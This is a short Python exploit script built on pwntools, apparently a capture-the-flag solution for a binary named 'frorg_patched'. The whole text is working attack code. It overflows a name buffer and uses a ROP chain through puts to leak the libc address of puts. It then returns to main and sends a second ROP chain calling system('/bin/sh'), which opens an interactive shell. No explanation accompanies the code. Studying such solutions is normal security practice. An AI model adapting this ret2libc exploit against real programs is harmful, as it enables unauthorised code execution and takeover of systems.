from pwn import *
elf = context.binary = ELF("./frorg_patched")
libc = ELF("./libc.so.6")
r = elf.process()
gdb.attach(r,'''b*main+165''' )
def send_data(data):
r.sendlineafter(b"name:", data)
r.sendlineafter(b"How many frorgies you want to store?", str(9))
for i in range(5):
send_data(str(1))
print(f"Send name {i} time")
#ROP_chain
pop_rdi = 0x4011e5
ret = pop_rdi + 1
#Leak libc address
payload = b"a" * 6 + p64(pop_rdi) + p64(elf.got["puts"]) + p64(elf.plt["puts"]) + p64(elf.sym["main"])
send_data(payload)
r.recvuntil(b"Thank you!\n")
puts_leak = u64(r.recv(6).ljust(8,b'\0'))
log.success(f"Puts leak: {hex(puts_leak)}")
libc.address = puts_leak - libc.sym["puts"]
log.success(f"LIBC address: {hex(libc.address)}")
#Execute bin/sh
r.sendlineafter(b"How many frorgies you want to store?", str(9))
for i in range(5):
send_data(str(1))
print(f"Send name {i} time")
payload = b"a" * 6 + p64(ret) + p64(pop_rdi) + p64(next(libc.search(b"/bin/sh"))) + p64(libc.sym["system"])
send_data(payload)
r.interactive()
